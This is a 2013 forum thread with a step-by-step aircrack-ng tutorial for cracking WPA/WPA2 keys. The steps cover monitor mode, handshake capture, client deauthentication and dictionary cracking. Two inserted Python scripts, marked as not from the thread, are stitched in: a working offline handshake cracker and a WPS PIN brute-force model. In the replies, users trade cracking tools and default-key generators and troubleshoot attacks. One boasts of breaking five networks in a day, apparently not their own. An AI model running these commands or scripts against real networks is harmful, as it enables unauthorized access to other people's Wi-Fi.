Nytro Posted April 2, 2013

How To Crack A WPA Key With Aircrack-ng

With the increase in popularity of wireless networks and mobile computing, an overall understanding of common security issues has become not only relevant but necessary for home users and IT professionals alike. This article illustrates current security flaws in WPA/WPA2. Successfully cracking a wireless network assumes some basic familiarity with networking principles and terminology.

To crack WPA/WPA2 you first need to be able to put your wireless network card into "monitor" mode, so that it passively captures packets without being associated with a network. One of the best free utilities for monitoring wireless traffic and cracking WPA-PSK/WPA2-PSK keys is the aircrack-ng suite, which we will use throughout this article. It has both Linux and Windows versions (provided your network card is supported under Windows).

Network adapter used for WPA/WPA2 cracking: Alfa AWUS036H. OS: BackTrack 5 R2.

Step 1: Setting up your network device
To capture network traffic without being associated with an access point, we need to put the wireless network card into monitor mode. To do that, type:
Command # iwconfig (lists all wireless network interfaces and their status)
Command # airmon-ng start wlan0 (puts the card into monitor mode; substitute your own interface name for wlan0. airmon-ng creates a separate monitor interface, mon0, which the following steps use.)

Step 2: Reconnaissance
This step assumes you've already put your wireless interface into monitor mode; you can check with the iwconfig command. The next step is finding the available wireless networks and choosing your target:
Command # airodump-ng mon0 (hops across all channels, listing the access points and associated clients within range)

Step 3: Capturing packets
To capture data into a file we use airodump-ng again, with additional switches to lock onto a specific AP and channel. Assuming our monitor interface is mon0 and we want to capture packets on channel 1 into capture files whose names start with data:
Command # airodump-ng -c 1 --bssid AP_MAC -w data mon0 (where AP_MAC is the MAC address of the target access point; the capture is written to data-01.cap)

Step 4: De-authentication technique
To crack a WPA-PSK network you first need a capture file containing the four-way handshake, which is only exchanged when a client (re)connects. To speed up capturing it, you can deauthenticate an associated client so that it reconnects, using:
Command # aireplay-ng --deauth 3 -a AP_MAC -c CLIENT_MAC mon0 (where AP_MAC is the MAC address of the access point and CLIENT_MAC is the MAC address of an associated client)
airodump-ng shows "WPA handshake: AP_MAC" in its top-right corner once the handshake has been captured. So now we have successfully acquired a WPA handshake.

Step 5: Cracking WPA/WPA2
Once you have captured a four-way handshake, you also need a large, relevant dictionary file (commonly known as a wordlist) of common passphrases:
Command # aircrack-ng -w wordlist capture_file.cap (where wordlist is your dictionary file and capture_file.cap is a capture containing a valid WPA handshake)

Cracking WPA-PSK and WPA2-PSK only needs a captured handshake. After that, the offline dictionary attack on that handshake takes much longer, and will only succeed against weak passphrases with a good dictionary. Cracking WPA/WPA2 usually takes many hours, testing tens of millions of possible keys for the chance of stumbling on a combination of common numerals or dictionary words. Still, a weak/short/common/human-readable passphrase can be broken within a few minutes by an offline dictionary attack.

About the author: Shaharyar Shafiq is studying for a Bachelor's in Computer Engineering at Hamdard University. He holds the C|PTE (Certified Penetration Testing Engineer) certification and is interested in network penetration testing and forensics.

Source: How To Crack A WPA Key With Aircrack-ng | Learn How To Hack - Ethical Hacking and security tips
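What aircrack-ng actually does with the handshake in Step 5 is worth seeing in code. The following is an added example, not code from the original post or from the aircrack-ng project: for every wordlist entry it derives the PMK with PBKDF2-HMAC-SHA1 (4096 rounds, which is what makes WPA cracking slow), expands it to the PTK with the 802.11i PRF, and recomputes the MIC of EAPOL-Key message 2 with the KCK; a match means the candidate is the passphrase. The handshake, MAC addresses, nonces, wordlist and the passphrase `letmein123` are all constructed inside the file, not taken from a real capture; the only external value is the IEEE 802.11i PBKDF2 test vector (passphrase `password`, SSID `IEEE`).

```python
"""Offline WPA/WPA2-PSK dictionary attack against a captured 4-way handshake.

Added example, not code from the original post or from aircrack-ng. It
re-implements the check aircrack-ng runs for every wordlist entry: derive the
PMK with PBKDF2-HMAC-SHA1 (4096 rounds), expand it to the PTK with the 802.11i
PRF, and recompute the MIC of EAPOL-Key message 2 with the KCK. The handshake
and wordlist at the bottom are CONSTRUCTED here, not taken from a capture.
"""
import hashlib
import hmac
from typing import Iterable, Optional

# Offset of the 16-byte MIC inside an EAPOL-Key frame:
# EAPOL header (4) + descriptor type (1) + key info (2) + key length (2)
# + replay counter (8) + nonce (32) + key IV (16) + key RSC (8) + key ID (8)
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096, 32). The costly step per candidate."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i), i = 0..3, cut to 64 bytes."""
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest() for i in range(4)]
    return b"".join(blocks)[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the PMK and the four public handshake values; PTK[0:16] is the KCK that keys the MIC."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_key_mic(kck: bytes, eapol: bytes) -> bytes:
    """MIC over the EAPOL-Key frame with the MIC field zeroed; algorithm follows the descriptor version."""
    version = int.from_bytes(eapol[5:7], "big") & 0x7
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    if version == 1:  # WPA (TKIP): HMAC-MD5
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    if version == 2:  # WPA2 (CCMP): HMAC-SHA1 truncated to 128 bits
        return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]
    raise ValueError(f"unsupported key descriptor version {version}")  # v3 (AES-CMAC) not handled here


def crack_handshake(hs: dict, wordlist: Iterable[str]) -> Optional[str]:
    """Return the passphrase whose derived KCK reproduces the captured MIC, or None."""
    captured_mic = hs["eapol"][MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        candidate = candidate.strip()
        if not 8 <= len(candidate) <= 63:  # outside WPA-PSK limits: skip before paying for PBKDF2
            continue
        pmk = pmk_from_passphrase(candidate, hs["ssid"])
        kck = derive_ptk(pmk, hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])[:16]
        if hmac.compare_digest(eapol_key_mic(kck, hs["eapol"]), captured_mic):
            return candidate
    return None


# ---- constructed test handshake (synthetic MACs, nonces and passphrase) ----

def build_eapol_msg2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """Minimal WPA2 EAPOL-Key message 2 (STA -> AP) with an empty key-data field."""
    body = (b"\x02"                                       # descriptor type: RSN
            + (0x010A).to_bytes(2, "big")                 # key info: version 2, pairwise, MIC present
            + b"\x00\x00"                                 # key length
            + (1).to_bytes(8, "big")                      # replay counter
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8  # nonce, IV, RSC, ID
            + mic + b"\x00\x00")                          # MIC, key-data length 0
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body  # EAPOL v2, type 3 (EAPOL-Key)


def make_constructed_handshake(passphrase: str, ssid: str) -> dict:
    """Build the values airodump-ng would capture, with the MIC computed under `passphrase`."""
    hs = {
        "ssid": ssid,
        "ap_mac": bytes.fromhex("001122334455"),            # constructed BSSID
        "sta_mac": bytes.fromhex("66778899aabb"),           # constructed client MAC
        "anonce": hashlib.sha256(b"constructed-anonce").digest(),
        "snonce": hashlib.sha256(b"constructed-snonce").digest(),
    }
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), hs["ap_mac"], hs["sta_mac"],
                     hs["anonce"], hs["snonce"])[:16]
    mic = eapol_key_mic(kck, build_eapol_msg2(hs["snonce"]))
    hs["eapol"] = build_eapol_msg2(hs["snonce"], mic)
    return hs


DEMO_HANDSHAKE = make_constructed_handshake("letmein123", "ExampleNet")
DEMO_WORDLIST = ["password", "12345678", "qwertyuiop", "letmein123", "correcthorse"]

if __name__ == "__main__":
    print("IEEE test vector PMK:", pmk_from_passphrase("password", "IEEE").hex())
    print("recovered passphrase:", crack_handshake(DEMO_HANDSHAKE, DEMO_WORDLIST))
```

Two things the script makes visible that the tutorial only states: everything except the passphrase (SSID, both MACs, both nonces, the EAPOL frame) is sent in the clear, so one captured handshake is enough for unlimited offline guessing; and each guess costs 4096 HMAC-SHA1 rounds, which is why the attack is bounded by the wordlist quality rather than by the radio.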
Maximus Posted April 2, 2013
But what about WPA2? Almost all of them come with WPA2 as the default.

TheTime Posted April 2, 2013
Spide, it's the same procedure. The post above teaches you step by step how to capture a handshake and then brute-force it with a dictionary. Another method would be to check whether WPS is enabled and brute-force that. Not all routers have WPS enabled, and not all that do are susceptible to the attacks, but in the favourable cases the password comes out much faster. If you really want to crack a WPA/WPA2 network, these are pretty much the methods.
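The reason the WPS route mentioned above is so much faster than a dictionary attack is structural, and the following added example (not code from the thread, from Reaver or from any of the tools named in it) shows it. An 8-digit WPS PIN carries only seven free digits because the last one is a checksum, and the registrar acknowledges the first four digits and the last three separately, so the search space collapses from 10^7 to at most 10^4 + 10^3 attempts. The `Registrar` class is a constructed stand-in for the access point that answers only those two yes/no questions; nothing here touches the radio.

```python
"""Why a WPS PIN brute force finishes in hours while a WPA2 dictionary attack may never.

Added example, not code from the thread or from Reaver. A WPS PIN is 8 digits;
the last digit is a checksum over the first seven, and the registrar reports a
wrong first half (M4 failure) separately from a wrong second half (M6 failure).
`Registrar` is a CONSTRUCTED model of the AP that only answers those questions.
"""
from typing import Tuple

WEIGHTS = (3, 1, 3, 1, 3, 1, 3)


def wps_checksum(first7: str) -> int:
    """Checksum digit for the first seven PIN digits (weights 3,1,3,1,3,1,3, mod 10)."""
    total = sum(w * int(d) for w, d in zip(WEIGHTS, first7))
    return (10 - total % 10) % 10


def wps_pin_valid(pin: str) -> bool:
    """True if the 8-digit PIN's last digit is the checksum of the first seven."""
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(pin[:7])


class Registrar:
    """Constructed model of an AP's WPS registrar: leaks whether each PIN half is right."""

    def __init__(self, pin: str):
        if not wps_pin_valid(pin):
            raise ValueError("registrar PIN must have a valid checksum")
        self._first, self._second = pin[:4], pin[4:]
        self.attempts = 0

    def try_pin(self, pin: str) -> str:
        """'M4' = first half wrong, 'M6' = second half wrong, 'OK' = PIN accepted."""
        self.attempts += 1
        if pin[:4] != self._first:
            return "M4"
        if pin[4:] != self._second:
            return "M6"
        return "OK"


def split_bruteforce(reg: Registrar) -> Tuple[str, int]:
    """Recover the PIN half by half; returns (pin, attempts used). Worst case 11,000 attempts."""
    first = None
    for i in range(10_000):
        cand = f"{i:04d}0000"  # second half is irrelevant while probing the first
        if reg.try_pin(cand) != "M4":
            first = cand[:4]
            break
    if first is None:
        raise RuntimeError("first half not found; registrar did not behave as modelled")
    for j in range(1_000):
        tail = f"{j:03d}"
        pin = first + tail + str(wps_checksum(first + tail))  # only checksum-valid PINs are tried
        if reg.try_pin(pin) == "OK":
            return pin, reg.attempts
    raise RuntimeError("second half not found")


if __name__ == "__main__":
    found, used = split_bruteforce(Registrar("12345670"))
    print(f"recovered {found} after {used} attempts")
```

In practice the bottleneck is the AP, not the math: most firmware rate-limits or locks WPS after a burst of failures, which is the "not all that have it enabled are susceptible" caveat in the post above.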
danger2u Posted April 2, 2013
Thanks, Nytro. I'll wait until I've saved up for that TP-Link parabolic antenna and come back with feedback.

GarryOne Posted April 2, 2013
> Thanks, Nytro. I'll wait until I've saved up for that TP-Link parabolic antenna and come back with feedback.
That's what I thought too, that this was the only solution, until I installed wifislax. I've already cracked 5 wireless networks in the last 24 hours, regardless of whether they were WEP, WPA or WPA2. So you can crack passwords just fine with the laptop's own network card, you just have to know how.

danger2u Posted April 2, 2013
> That's what I thought too, that this was the only solution, until I installed wifislax. I've already cracked 5 wireless networks in the last 24 hours, regardless of whether they were WEP, WPA or WPA2. So you can crack passwords just fine with the laptop's own network card, you just have to know how.
Could you give me some advice in private? Thanks a lot.

GarryOne Posted April 2, 2013 (edited)
I have nothing to hide: install wifislax, which is much better than BackTrack in this area. GOYscript is something fantastic. GOYscript wep, wpa and wps do pretty much all the work. There's also WPSPinGenerator, which gives you the password instantly on some routers. There's also Inflator, but GOYscript does the job better.
Edited April 3, 2013 by GarryOne

danger2u Posted April 3, 2013
OK, if you can, give me a link where I can get wifislax. Thanks.

danger2u Posted April 3, 2013
Servidor www.seguridadwireless.net
Any idea???
Maximus Posted April 3, 2013
I get an error:

root@bt:~# airodump-ng -c 4 -bssid C8:3A:35:07:21:90 AP_MAC -w data mon0
Notice: You specified "-bssid". Did you mean "--bssid" instead?
y
Notice: Channel range already given
"airodump-ng --help" for help.
root@bt:~# airodump-ng --bssid C8:3A:35:07:21:90 AP_MAC -w data mon0
"airodump-ng --help" for help.
root@bt:~#

Can anyone help me? Thanks in advance.

GarryOne Posted April 3, 2013 (edited)
> I get an error: [...] Can anyone help me? Thanks in advance.
Use either -b or --bssid, but in no case -bssid. But as a piece of advice, you're better off using GOYscript or Reaver than aircrack.
> Any idea???
It isn't finding any network with WPS enabled.
Edited April 3, 2013 by GarryOne

Maximus Posted April 3, 2013
Same nonsense with -c:

root@bt:~# airodump-ng -c 4 -b C8:3A:35:07:21:90 AP_MAC -w data mon0
Notice: Channel range already given
"airodump-ng --help" for help.
root@bt:~#

Sorry for the double post, but I've been struggling with this for about 2 hours.

GarryOne Posted April 3, 2013 (edited)
First of all, it's a notice, i.e. just a warning, so it doesn't affect you at all; you can ignore it. Second, you need to read the error "channel already given", meaning the channel is already known and you don't need to specify it again. Leave aircrack alone and install the GOYscript module (you'll find tutorials online), or install wifislax, which has all of this integrated, and you just pick the network and GOYscript does all the work for you. You can also try WPSPinGenerator, which gives you the password instantly on some routers that still have the default PIN.
Edited April 3, 2013 by GarryOne

GarryOne Posted April 3, 2013
You need to be near some wifi networks, otherwise how do you expect to crack anything? About 80% of routers have WPS enabled; if it doesn't find a single one for you, it means you don't really have wifi networks around you. Try GOYscript WEP, maybe you have WEP networks. I cracked 2 WEP networks, each in 6 minutes, with GOYscript WEP.
danger2u Posted April 4, 2013
It found and saved a handshake for me. What do I do with it?

GarryOne Posted April 4, 2013
The password appears in the console; I don't know what you did there. Post a screenshot so I can see. You probably weren't paying attention when the password appeared.

Maximus Posted April 4, 2013
I still can't get a handshake:

CH 4 ][ Elapsed: 11 mins ][ 2013-04-04 05:50

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
C8:3A:35:07:21:90  -127 100     6805      550    1   4  54e. WPA2 CCMP   PSK  Sparge-ma

BSSID              STATION            PWR   Rate    Lost  Frames  Probe
C8:3A:35:07:21:90  48:5D:60:39:B4:6B  -127   1e- 1     0   20636  Sparge-ma

05:46:27  Sending 64 directed DeAuth. STMAC: [48:5D:60:39:B4:6B] [ 2|58 ACKs]

It disconnects me, the laptop reconnects automatically, but it doesn't give me a handshake.

GarryOne Posted April 4, 2013
I'll come back with a tutorial of my own from what I've learned so far, after a lot of experimenting.
PS: Thanks to wifislax, I've already learned Spanish pretty well.

danger2u Posted April 4, 2013
GOYscript wpa Wifislax - YouTube
What do I need to do next??

sorelian Posted April 4, 2013 (edited)
I don't know which beta version of wifislax you downloaded... the latest is beta 13. I don't know which wireless card you have... but it isn't finding the network and the associated client, without which you can't get a handshake! For the moment there is no "next". Here's a demo for goyscriptWPA:
But, if it's an ALICE network... haven't you searched the Italian sites for ALICE key generators? It's based on the MAC... Even if you do get a handshake, you can't do anything with it without a suitable dictionary. In 99% of cases these keep the default key.
Edited April 4, 2013 by sorelian

danger2u Posted April 4, 2013 (edited)
Do you have a good dictionary?
wifislax 4.4 beta
Edited April 4, 2013 by danger2u